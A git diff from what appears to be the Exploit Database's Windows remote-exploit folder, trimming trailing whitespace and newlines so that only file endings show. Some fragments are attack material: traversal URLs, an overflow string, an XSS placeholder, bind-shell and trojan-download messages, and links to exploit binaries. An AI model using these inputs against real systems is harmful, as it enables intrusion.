b/platforms/windows/remote/19937.pl index 466af58eb..42f44fb12 100755 --- a/platforms/windows/remote/19937.pl +++ b/platforms/windows/remote/19937.pl @@ -103,6 +103,4 @@ if ($socket = IO::Socket::INET->new else { print "[-] Connection to $target failed!\n"; -} - - +} \ No newline at end of file diff --git a/platforms/windows/remote/19958.rb b/platforms/windows/remote/19958.rb index d3f918d4e..0f9f74d18 100755 --- a/platforms/windows/remote/19958.rb +++ b/platforms/windows/remote/19958.rb @@ -187,4 +187,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19959.rb b/platforms/windows/remote/19959.rb index e71c0a5e5..8240252fd 100755 --- a/platforms/windows/remote/19959.rb +++ b/platforms/windows/remote/19959.rb @@ -183,4 +183,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/19975.pl b/platforms/windows/remote/19975.pl index dc143bd07..f2a55db68 100755 --- a/platforms/windows/remote/19975.pl +++ b/platforms/windows/remote/19975.pl @@ -27,4 +27,4 @@ for ($i = 2; $i < 4096; $i++) print "/ = $i\n\n$data\n\n"; exit; } -} +} \ No newline at end of file diff --git a/platforms/windows/remote/19997.java b/platforms/windows/remote/19997.java index cc2f5ae55..ea487d136 100755 --- a/platforms/windows/remote/19997.java +++ b/platforms/windows/remote/19997.java @@ -44,4 +44,4 @@ anonymous"; for (int i = 0; i < 10000; i++) white.print("A"); white.println(); // uNf! Who yoh daddy, bitch? weed.readLine(); - white.println("QUIT"); } } + white.println("QUIT"); } } \ No newline at end of file diff --git a/platforms/windows/remote/2.c b/platforms/windows/remote/2.c index a02f3dac0..673936482 100755 --- a/platforms/windows/remote/2.c +++ b/platforms/windows/remote/2.c @@ -408,4 +408,4 @@ close(s); } -// milw0rm.com [2003-03-24] +// milw0rm.com [2003-03-24] \ No newline at end of file diff --git a/platforms/windows/remote/20.txt b/platforms/windows/remote/20.txt index 67232b830..55688e12f 100755 --- a/platforms/windows/remote/20.txt +++ b/platforms/windows/remote/20.txt @@ -315,4 +315,4 @@ int am_parent = 1; /* the last message the was processed */ -# milw0rm.com [2003-04-25] +# milw0rm.com [2003-04-25] \ No newline at end of file diff --git a/platforms/windows/remote/20028.rb b/platforms/windows/remote/20028.rb index fccc1f183..c4617368b 100755 --- a/platforms/windows/remote/20028.rb +++ b/platforms/windows/remote/20028.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/20040.c b/platforms/windows/remote/20040.c index 51f97687d..4d938ebce 100755 --- a/platforms/windows/remote/20040.c +++ b/platforms/windows/remote/20040.c @@ -187,5 +187,4 @@ JMPEAX_2) pretadr=p; closesocket(sock); printf("Done.\n"); return FALSE; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/20066.java b/platforms/windows/remote/20066.java index 3cc19de8e..a6eadf4df 100755 --- a/platforms/windows/remote/20066.java +++ b/platforms/windows/remote/20066.java @@ -54,4 +54,4 @@ class savantstack { System.out.println("Done!"); white.close(); - soq.close(); } } + soq.close(); } } \ No newline at end of file diff --git a/platforms/windows/remote/20086.c b/platforms/windows/remote/20086.c index 02e4f4521..62a9f8f4d 100755 --- a/platforms/windows/remote/20086.c +++ b/platforms/windows/remote/20086.c @@ -408,10 +408,4 @@ int main(int argc, char *argv[]) return 0; -} - - - - - - +} \ No newline at end of file diff --git a/platforms/windows/remote/20106.cpp b/platforms/windows/remote/20106.cpp index b93c9dbd9..9f429ae53 100755 --- a/platforms/windows/remote/20106.cpp +++ b/platforms/windows/remote/20106.cpp @@ -3733,5 +3733,4 @@ int main(int argc, char* argv[]) } -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20106.exe - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20106.exe \ No newline at end of file diff --git a/platforms/windows/remote/20112.rb b/platforms/windows/remote/20112.rb index bca60cc4e..17a4e2d2d 100755 --- a/platforms/windows/remote/20112.rb +++ b/platforms/windows/remote/20112.rb @@ -260,4 +260,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/20120.pl b/platforms/windows/remote/20120.pl index 0f6601284..bb0b6d77c 100755 --- a/platforms/windows/remote/20120.pl +++ b/platforms/windows/remote/20120.pl @@ -90,5 +90,4 @@ print $sock "POST $page HTTP/1.0\r\n" . while(<$sock>){ print $_; } -exit; - +exit; \ No newline at end of file diff --git a/platforms/windows/remote/20122.rb b/platforms/windows/remote/20122.rb index 5909d89db..b4c0a3a1d 100755 --- a/platforms/windows/remote/20122.rb +++ b/platforms/windows/remote/20122.rb @@ -156,5 +156,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/20125.txt b/platforms/windows/remote/20125.txt index 18b478444..9d1c64189 100755 --- a/platforms/windows/remote/20125.txt +++ b/platforms/windows/remote/20125.txt @@ -16,5 +16,4 @@ If this code is somehow inserted in the file "temp.txt" via an application, then http://weblogic.site/*.jhtml/path/to/temp.txt (JHTML) -or- -http://weblogic.site/*.jsp/path/to/temp.txt " - +http://weblogic.site/*.jsp/path/to/temp.txt " \ No newline at end of file diff --git a/platforms/windows/remote/20134.pl b/platforms/windows/remote/20134.pl index b4e18208f..3eb4f1817 100755 --- a/platforms/windows/remote/20134.pl +++ b/platforms/windows/remote/20134.pl @@ -25,4 +25,4 @@ print "Click here to exploit.!"; +"\">Click here to exploit.!"; \ No newline at end of file diff --git a/platforms/windows/remote/2014.pl b/platforms/windows/remote/2014.pl index 984229daa..4c2436995 100755 --- a/platforms/windows/remote/2014.pl +++ b/platforms/windows/remote/2014.pl @@ -96,4 +96,4 @@ print "\n\nTry: telnet remote_ip 4444\n\n". "To my friend 'Esteban T.' and to all of my friends...you know who you are.\n". "Have a nice day :)\n\n"; -# milw0rm.com [2006-07-15] +# milw0rm.com [2006-07-15] \ No newline at end of file diff --git a/platforms/windows/remote/20148.pl b/platforms/windows/remote/20148.pl index 1693ac6f4..fe5417205 100755 --- a/platforms/windows/remote/20148.pl +++ b/platforms/windows/remote/20148.pl @@ -223,4 +223,4 @@ show_credits; pcommands; bofit; -# ----- that's all :) +# ----- that's all :) \ No newline at end of file diff --git a/platforms/windows/remote/20151.pl b/platforms/windows/remote/20151.pl index b612601a8..d9d94b39a 100755 --- a/platforms/windows/remote/20151.pl +++ b/platforms/windows/remote/20151.pl @@ -46,4 +46,4 @@ header :)) print $res->content; } else { print $res->error_as_HTML; - } + } \ No newline at end of file diff --git a/platforms/windows/remote/20152.pl b/platforms/windows/remote/20152.pl index 6aa995d23..c0e10a0a7 100755 --- a/platforms/windows/remote/20152.pl +++ b/platforms/windows/remote/20152.pl @@ -39,4 +39,4 @@ sub sendraw { # this saves the whole transaction anyway print STDOUT "." if(defined $args{X});} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } -} +} \ No newline at end of file diff --git a/platforms/windows/remote/20174.rb b/platforms/windows/remote/20174.rb index 537605f2a..7ef671235 100755 --- a/platforms/windows/remote/20174.rb +++ b/platforms/windows/remote/20174.rb @@ -273,4 +273,4 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, content) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/20202.rb b/platforms/windows/remote/20202.rb index f7673e999..8b1c2e1d8 100755 --- a/platforms/windows/remote/20202.rb +++ b/platforms/windows/remote/20202.rb @@ -435,4 +435,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/20204.rb b/platforms/windows/remote/20204.rb index 007068741..c30b078da 100755 --- a/platforms/windows/remote/20204.rb +++ b/platforms/windows/remote/20204.rb @@ -106,4 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/20222.cpp b/platforms/windows/remote/20222.cpp index a74fddb8e..3e1fc3075 100755 --- a/platforms/windows/remote/20222.cpp +++ b/platforms/windows/remote/20222.cpp @@ -523,27 +523,4 @@ int main(int argc, char *argv[]) } return 0; -} - - - - - - - - - - - - - - - - - - - - - - - +} \ No newline at end of file diff --git a/platforms/windows/remote/20235.pl b/platforms/windows/remote/20235.pl index ee16ebc79..8737cd195 100755 --- a/platforms/windows/remote/20235.pl +++ b/platforms/windows/remote/20235.pl @@ -562,5 +562,4 @@ sub cisco14 # Cisco IOS HTTP server DoS Vulnerability print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/20269.txt b/platforms/windows/remote/20269.txt index 7e8fc5b71..1258012ae 100755 --- a/platforms/windows/remote/20269.txt +++ b/platforms/windows/remote/20269.txt @@ -16,5 +16,4 @@ Content-Length: 133 Select "DAV:displayname" from scope() - - + \ No newline at end of file diff --git a/platforms/windows/remote/20284.txt b/platforms/windows/remote/20284.txt index 9f1f2a568..99d228a84 100755 --- a/platforms/windows/remote/20284.txt +++ b/platforms/windows/remote/20284.txt @@ -13,4 +13,4 @@ Windows 9x remote administration is also affected by this vulnerability because Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20284.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20284.tar.gz \ No newline at end of file diff --git a/platforms/windows/remote/20287.c b/platforms/windows/remote/20287.c index 3e775dc71..0dcbc8de5 100755 --- a/platforms/windows/remote/20287.c +++ b/platforms/windows/remote/20287.c @@ -278,4 +278,4 @@ sent...allmail_orun.txt should have been created.\n"); closesocket(sock); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/20288.c b/platforms/windows/remote/20288.c index 16f8caa99..d4ac05d7b 100755 --- a/platforms/windows/remote/20288.c +++ b/platforms/windows/remote/20288.c @@ -304,4 +304,4 @@ else printf("\n connect err !\n"); closesocket(fd); WSACleanup( ); return(0); -} +} \ No newline at end of file diff --git a/platforms/windows/remote/20297.rb b/platforms/windows/remote/20297.rb index 9c5aa735f..cb0cf6342 100755 --- a/platforms/windows/remote/20297.rb +++ b/platforms/windows/remote/20297.rb @@ -402,4 +402,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/20299.pl b/platforms/windows/remote/20299.pl index 038c94ff4..5369ed50f 100755 --- a/platforms/windows/remote/20299.pl +++ b/platforms/windows/remote/20299.pl @@ -48,6 +48,4 @@ sub sendraw { # this saves the whole transaction anyway select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } -# Spidermark: sensepostdata - - +# Spidermark: sensepostdata \ No newline at end of file diff --git a/platforms/windows/remote/20321.rb b/platforms/windows/remote/20321.rb index 20fae1be0..5cd646aba 100755 --- a/platforms/windows/remote/20321.rb +++ b/platforms/windows/remote/20321.rb @@ -427,4 +427,4 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_ super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/20325.txt b/platforms/windows/remote/20325.txt index 83f8909cf..6fd56216d 100755 --- a/platforms/windows/remote/20325.txt +++ b/platforms/windows/remote/20325.txt @@ -7,4 +7,4 @@ Acquiring access to known files outside of the web root is possible through dire - The End Entity services server on port 443/tcp (Accessible through SSL) - The Administrator services server on a random port configured during installation. -https://target/ca/\../\../\../\file.ext +https://target/ca/\../\../\../\file.ext \ No newline at end of file diff --git a/platforms/windows/remote/20335.txt b/platforms/windows/remote/20335.txt index 5d9a4a3d6..9572105bb 100755 --- a/platforms/windows/remote/20335.txt +++ b/platforms/windows/remote/20335.txt @@ -6,4 +6,4 @@ http://target/null.htw?CiWebHitsFile=filename.htm&CiRestriction=" - + \ No newline at end of file diff --git a/platforms/windows/remote/22018.pl b/platforms/windows/remote/22018.pl index 5f5cfdc61..13527881f 100755 --- a/platforms/windows/remote/22018.pl +++ b/platforms/windows/remote/22018.pl @@ -14,6 +14,4 @@ $url = uri_escape($ARGV[0]); $exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n"); print $f $exploit; undef $f; -} - - +} \ No newline at end of file diff --git a/platforms/windows/remote/22023.c b/platforms/windows/remote/22023.c index 18b233b18..d311fb961 100755 --- a/platforms/windows/remote/22023.c +++ b/platforms/windows/remote/22023.c @@ -83,4 +83,4 @@ strcat(death,end); printf("\r\rIf exploit worked, then it should bind port on 3879\n"); } -/* redsand.net */ +/* redsand.net */ \ No newline at end of file diff --git a/platforms/windows/remote/22082.pl b/platforms/windows/remote/22082.pl index 64a2ae68c..feefbb2c4 100755 --- a/platforms/windows/remote/22082.pl +++ b/platforms/windows/remote/22082.pl @@ -86,4 +86,4 @@ sleep 1; print $sox $xploit; sleep 2; close $sox; -print "Done..trojan is been downloaded onto system, give it a min or two then scan and connect ;) \n"; +print "Done..trojan is been downloaded onto system, give it a min or two then scan and connect ;) \n"; \ No newline at end of file diff --git a/platforms/windows/remote/22094.rb b/platforms/windows/remote/22094.rb index f65156311..f43b72432 100755 --- a/platforms/windows/remote/22094.rb +++ b/platforms/windows/remote/22094.rb @@ -215,4 +215,4 @@ class Metasploit3 < Msf::Exploit::Remote t.kill end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/22142.c b/platforms/windows/remote/22142.c index 55c90ce29..8f337f6bb 100755 --- a/platforms/windows/remote/22142.c +++ b/platforms/windows/remote/22142.c @@ -325,6 +325,4 @@ int main(int argc, char **argv) printf("Shell (hopefully) spawned at client host port 8008.\n"); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/windows/remote/22161.rb b/platforms/windows/remote/22161.rb index 17e252259..d989f806f 100755 --- a/platforms/windows/remote/22161.rb +++ b/platforms/windows/remote/22161.rb @@ -195,4 +195,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/2223.c b/platforms/windows/remote/2223.c index 6e9401959..e0ef2b5a5 100755 --- a/platforms/windows/remote/2223.c +++ b/platforms/windows/remote/2223.c @@ -588,4 +588,4 @@ close(fd); } -// milw0rm.com [2006-08-19] +// milw0rm.com [2006-08-19] \ No newline at end of file diff --git a/platforms/windows/remote/22270.txt b/platforms/windows/remote/22270.txt index 3a048ad3e..8f7d6b44a 100755 --- a/platforms/windows/remote/22270.txt +++ b/platforms/windows/remote/22270.txt @@ -6,5 +6,4 @@ This issue is due to insufficient sanitization of input submitted in URI paramet When such a link is visited by an unsuspecting user, attacker-supplied script code will be interpreted by their web client. -http://hostname/?mod=&op=browse - +http://hostname/?mod=&op=browse \ No newline at end of file diff --git a/platforms/windows/remote/22289.c b/platforms/windows/remote/22289.c index 6d24a18ec..dcdeff457 100755 --- a/platforms/windows/remote/22289.c +++ b/platforms/windows/remote/22289.c @@ -219,6 +219,4 @@ if ( ExploitFile == INVALID_HANDLE_VALUE) { return 0; -} - - +} \ No newline at end of file diff --git a/platforms/windows/remote/22301.html b/platforms/windows/remote/22301.html index f1ea5b559..7e2281933 100755 --- a/platforms/windows/remote/22301.html +++ b/platforms/windows/remote/22301.html @@ -45,4 +45,4 @@ - + \ No newline at end of file diff --git a/platforms/windows/remote/22305.rb b/platforms/windows/remote/22305.rb index ae85aeea5..5deef3df4 100755 --- a/platforms/windows/remote/22305.rb +++ b/platforms/windows/remote/22305.rb @@ -232,4 +232,4 @@ user-agent: BBC 11.00.044; 14 disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/2233.c b/platforms/windows/remote/2233.c index 93cfb71ac..f8e2e7409 100755 --- a/platforms/windows/remote/2233.c +++ b/platforms/windows/remote/2233.c @@ -191,4 +191,4 @@ getchar(); //EoF -// milw0rm.com [2006-08-21] +// milw0rm.com [2006-08-21] \ No newline at end of file diff --git a/platforms/windows/remote/2234.py b/platforms/windows/remote/2234.py index 5286188c1..b3e15ebeb 100755 --- a/platforms/windows/remote/2234.py +++ b/platforms/windows/remote/2234.py @@ -63,4 +63,4 @@ s.close() #EoF -# milw0rm.com [2006-08-21] +# milw0rm.com [2006-08-21] \ No newline at end of file diff --git a/platforms/windows/remote/22366.c b/platforms/windows/remote/22366.c index 5a08d3ad9..641d95abf 100755 --- a/platforms/windows/remote/22366.c +++ b/platforms/windows/remote/22366.c @@ -224,4 +224,4 @@ D:\code\exploits\regedit> this is too easy... -*********************/ +*********************/ \ No newline at end of file diff --git a/platforms/windows/remote/22432.rb b/platforms/windows/remote/22432.rb index 64e464ac2..4ed3fdfbb 100755 --- a/platforms/windows/remote/22432.rb +++ b/platforms/windows/remote/22432.rb @@ -124,4 +124,4 @@ class Metasploit3 < Msf::Exploit::Remote send_echo_reply(rand_text(20)) # something like... get up! ? send_echo_reply(bof) # exploit end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/22466.py b/platforms/windows/remote/22466.py index a323e6400..a82c29872 100755 --- a/platforms/windows/remote/22466.py +++ b/platforms/windows/remote/22466.py @@ -183,5 +183,4 @@ buffer = "USV " + payload + padding + "\r\n\r\n" sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((target_address,target_port)) sock.send(buffer) -sock.close() - +sock.close() \ No newline at end of file diff --git a/platforms/windows/remote/22525.rb b/platforms/windows/remote/22525.rb index e8e74246b..58649ff70 100755 --- a/platforms/windows/remote/22525.rb +++ b/platforms/windows/remote/22525.rb @@ -126,4 +126,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/22526.rb b/platforms/windows/remote/22526.rb index e3dc05347..da8b87939 100755 --- a/platforms/windows/remote/22526.rb +++ b/platforms/windows/remote/22526.rb @@ -236,4 +236,4 @@ class Metasploit3 < Msf::Exploit::Remote return false end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/22556.c b/platforms/windows/remote/22556.c index 732c574b9..c3cd22088 100755 --- a/platforms/windows/remote/22556.c +++ b/platforms/windows/remote/22556.c @@ -109,5 +109,4 @@ printf("Remote Webserver has been DoS'ed "); closesocket(mysocket); WSACleanup(); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/22562.pl b/platforms/windows/remote/22562.pl index 37d244371..d9557fd7b 100755 --- a/platforms/windows/remote/22562.pl +++ b/platforms/windows/remote/22562.pl @@ -119,4 +119,4 @@ print "Number Of Tries : $count \n"; sub space { print "\n" x2; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/22563.pl b/platforms/windows/remote/22563.pl index cfc7240dd..1de06157d 100755 --- a/platforms/windows/remote/22563.pl +++ b/platforms/windows/remote/22563.pl @@ -114,4 +114,4 @@ print "Confirmed Users : $found \n"; sub space { print "\n" x2; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/22570.java b/platforms/windows/remote/22570.java index ddb422805..d9c060062 100755 --- a/platforms/windows/remote/22570.java +++ b/platforms/windows/remote/22570.java @@ -71,4 +71,4 @@ public class MediaPlayerExploit extends HttpServlet { doGet(request, response); } -} +} \ No newline at end of file diff --git a/platforms/windows/remote/2258.py b/platforms/windows/remote/2258.py index 36f42d8c5..cbb07ae22 100755 --- a/platforms/windows/remote/2258.py +++ b/platforms/windows/remote/2258.py @@ -149,4 +149,4 @@ s.send('USER ' + 'A' * 3370 + '\r\n') s.close() sleep(1) -# milw0rm.com [2006-08-26] +# milw0rm.com [2006-08-26] \ No newline at end of file diff --git a/platforms/windows/remote/22627.pl b/platforms/windows/remote/22627.pl index a80005642..1fae4d478 100755 --- a/platforms/windows/remote/22627.pl +++ b/platforms/windows/remote/22627.pl @@ -108,4 +108,4 @@ Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n"; print encode_base64($z); print "\n--zzz--\n"; -print "\n"; +print "\n"; \ No newline at end of file diff --git a/platforms/windows/remote/22635.c b/platforms/windows/remote/22635.c index 306b086d5..1053faf7c 100755 --- a/platforms/windows/remote/22635.c +++ b/platforms/windows/remote/22635.c @@ -204,4 +204,4 @@ D:\>type "c:\Program Files\Magic Winmail\server\logs\smtp.log" voila, tout est la :) -*/ +*/ \ No newline at end of file diff --git a/platforms/windows/remote/2265.c b/platforms/windows/remote/2265.c index bae84b9ed..9260a1251 100755 --- a/platforms/windows/remote/2265.c +++ b/platforms/windows/remote/2265.c @@ -177,4 +177,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2006-08-28] +// milw0rm.com [2006-08-28] \ No newline at end of file diff --git a/platforms/windows/remote/22677.txt b/platforms/windows/remote/22677.txt index 238f41faf..390185400 100755 --- a/platforms/windows/remote/22677.txt +++ b/platforms/windows/remote/22677.txt @@ -4,4 +4,4 @@ P-Synch does not adequately filter HTML code from URL parameters, making it pron This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users. Other attacks are also possible. -https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc] +https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc] \ No newline at end of file diff --git a/platforms/windows/remote/22678.rb b/platforms/windows/remote/22678.rb index b553833af..e4714aeed 100755 --- a/platforms/windows/remote/22678.rb +++ b/platforms/windows/remote/22678.rb @@ -122,4 +122,4 @@ class Metasploit4 < Msf::Exploit::Remote return end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/22714.rb b/platforms/windows/remote/22714.rb index 383c90bed..cf16f32e0 100755 --- a/platforms/windows/remote/22714.rb +++ b/platforms/windows/remote/22714.rb @@ -171,4 +171,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/2276.pm b/platforms/windows/remote/2276.pm index ecca7d53f..d15169243 100755 --- a/platforms/windows/remote/2276.pm +++ b/platforms/windows/remote/2276.pm @@ -300,4 +300,4 @@ sub Gzip { 1; -# milw0rm.com [2006-08-29] +# milw0rm.com [2006-08-29] \ No newline at end of file diff --git a/platforms/windows/remote/2277.c b/platforms/windows/remote/2277.c index d7ebe52c6..96b976ea0 100755 --- a/platforms/windows/remote/2277.c +++ b/platforms/windows/remote/2277.c @@ -186,4 +186,4 @@ int main (int argc, char **argv) { return 0; } -// milw0rm.com [2006-08-29] +// milw0rm.com [2006-08-29] \ No newline at end of file diff --git a/platforms/windows/remote/22782.py b/platforms/windows/remote/22782.py index d57c55d7e..c4961f565 100755 --- a/platforms/windows/remote/22782.py +++ b/platforms/windows/remote/22782.py @@ -45,4 +45,4 @@ class ActiveDirectoryDOS( Ldap ): # execute the anonymous query print 'executing query' filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 ) - self.searchSub( filterBuffer ) + self.searchSub( filterBuffer ) \ No newline at end of file diff --git a/platforms/windows/remote/22787.rb b/platforms/windows/remote/22787.rb index 133b7d906..6e89da019 100755 --- a/platforms/windows/remote/22787.rb +++ b/platforms/windows/remote/22787.rb @@ -146,4 +146,4 @@ class Metasploit3 < Msf::Exploit::Remote true end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/2283.c b/platforms/windows/remote/2283.c index 38153e407..ad10e72ea 100755 --- a/platforms/windows/remote/2283.c +++ b/platforms/windows/remote/2283.c @@ -419,4 +419,4 @@ int main(int argc, char* argv[]) } //--------------------------------------------------------------------------- -// milw0rm.com [2006-09-01] +// milw0rm.com [2006-09-01] \ No newline at end of file diff --git a/platforms/windows/remote/22834.c b/platforms/windows/remote/22834.c index 7bfa5575f..98bc017c1 100755 --- a/platforms/windows/remote/22834.c +++ b/platforms/windows/remote/22834.c @@ -156,4 +156,4 @@ void main(int argc, char *argv[]) ExitProcess(0); } -*/ +*/ \ No newline at end of file diff --git a/platforms/windows/remote/22837.c b/platforms/windows/remote/22837.c index 2c72e29f5..386b103f0 100755 --- a/platforms/windows/remote/22837.c +++ b/platforms/windows/remote/22837.c @@ -252,4 +252,4 @@ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); WSACleanup(); #endif return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/22854.txt b/platforms/windows/remote/22854.txt index 814e36a48..3cc083a97 100755 --- a/platforms/windows/remote/22854.txt +++ b/platforms/windows/remote/22854.txt @@ -225,6 +225,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or support -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/remote/22903.rb b/platforms/windows/remote/22903.rb index 8cc6a38a4..318e9d13c 100755 --- a/platforms/windows/remote/22903.rb +++ b/platforms/windows/remote/22903.rb @@ -292,4 +292,4 @@ class Metasploit3 < Msf::Exploit::Remote stop_service end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/22973.rb b/platforms/windows/remote/22973.rb index 6ecd56092..feaa1dfd0 100755 --- a/platforms/windows/remote/22973.rb +++ b/platforms/windows/remote/22973.rb @@ -227,4 +227,4 @@ CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"> handler(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23.c b/platforms/windows/remote/23.c index 64a7abb22..e7809574d 100755 --- a/platforms/windows/remote/23.c +++ b/platforms/windows/remote/23.c @@ -148,4 +148,4 @@ exit(0); } -// milw0rm.com [2003-04-30] +// milw0rm.com [2003-04-30] \ No newline at end of file diff --git a/platforms/windows/remote/23038.c b/platforms/windows/remote/23038.c index 0d8a597dc..8ed16e2d3 100755 --- a/platforms/windows/remote/23038.c +++ b/platforms/windows/remote/23038.c @@ -211,4 +211,4 @@ main (int argc, char *argv[]) } return 0; /* dead code */ -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23040.c b/platforms/windows/remote/23040.c index 688562742..da68f3de0 100755 --- a/platforms/windows/remote/23040.c +++ b/platforms/windows/remote/23040.c @@ -252,4 +252,4 @@ main (int argc, char *argv[]) } return 1; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23066.pl b/platforms/windows/remote/23066.pl index 2b683b832..f96a66890 100755 --- a/platforms/windows/remote/23066.pl +++ b/platforms/windows/remote/23066.pl @@ -29,4 +29,4 @@ This vulnerability is said to affect Tullerian TftpdNT 2.0 and earlier. $ipaddr = inet_aton($host) || $host; $portaddr = sockaddr_in($port, $ipaddr); send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n"; - print "Done\n"; + print "Done\n"; \ No newline at end of file diff --git a/platforms/windows/remote/23073.txt b/platforms/windows/remote/23073.txt index 6a955931b..d0c7f21ae 100755 --- a/platforms/windows/remote/23073.txt +++ b/platforms/windows/remote/23073.txt @@ -47,6 +47,4 @@ on the attacking machine. Yours Sincerely, --- Kingcope - - +-- Kingcope \ No newline at end of file diff --git a/platforms/windows/remote/23074.txt b/platforms/windows/remote/23074.txt index c101a80df..1382e8151 100755 --- a/platforms/windows/remote/23074.txt +++ b/platforms/windows/remote/23074.txt @@ -72,4 +72,4 @@ while(<$sock>) { Cheerio, -Kingcope +Kingcope \ No newline at end of file diff --git a/platforms/windows/remote/23095.c b/platforms/windows/remote/23095.c index 754aa8199..38c0e3d7c 100755 --- a/platforms/windows/remote/23095.c +++ b/platforms/windows/remote/23095.c @@ -53,4 +53,4 @@ Exploit**\n"); printf("\n\n" Filename " has been created.\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23100.c b/platforms/windows/remote/23100.c index 0c53a99b5..342547fad 100755 --- a/platforms/windows/remote/23100.c +++ b/platforms/windows/remote/23100.c @@ -388,5 +388,4 @@ if(s2 != INVALID_SOCKET) closesocket(s); WSACleanup(); } return retcode; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/23113.c b/platforms/windows/remote/23113.c index a6225f3a5..0b31598df 100755 --- a/platforms/windows/remote/23113.c +++ b/platforms/windows/remote/23113.c @@ -70,5 +70,4 @@ void main(int argc, char *argv[]) write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/23123.pl b/platforms/windows/remote/23123.pl index 4f6f14d93..92ed54cd4 100755 --- a/platforms/windows/remote/23123.pl +++ b/platforms/windows/remote/23123.pl @@ -89,5 +89,4 @@ print $socket "$buf"; print "ok\n=> Exiting... \n\n"; sleep(2); -close($socket); - +close($socket); \ No newline at end of file diff --git a/platforms/windows/remote/23155.rb b/platforms/windows/remote/23155.rb index 432751859..e50335df3 100755 --- a/platforms/windows/remote/23155.rb +++ b/platforms/windows/remote/23155.rb @@ -216,4 +216,4 @@ return "#{fingerprint}"; end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23179.rb b/platforms/windows/remote/23179.rb index 09a1923d4..222b7fdaf 100755 --- a/platforms/windows/remote/23179.rb +++ b/platforms/windows/remote/23179.rb @@ -142,4 +142,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/232.c b/platforms/windows/remote/232.c index eb7c4565f..d8d500716 100755 --- a/platforms/windows/remote/232.c +++ b/platforms/windows/remote/232.c @@ -554,4 +554,4 @@ int main(int ac, char *av[]) return 0; } -// milw0rm.com [2000-12-19] +// milw0rm.com [2000-12-19] \ No newline at end of file diff --git a/platforms/windows/remote/2320.txt b/platforms/windows/remote/2320.txt index cab5303b8..d22dbdcd2 100755 --- a/platforms/windows/remote/2320.txt +++ b/platforms/windows/remote/2320.txt @@ -9,4 +9,4 @@ This was fixed in the 5.10 version of ibm director. -Daniel Clemens -# 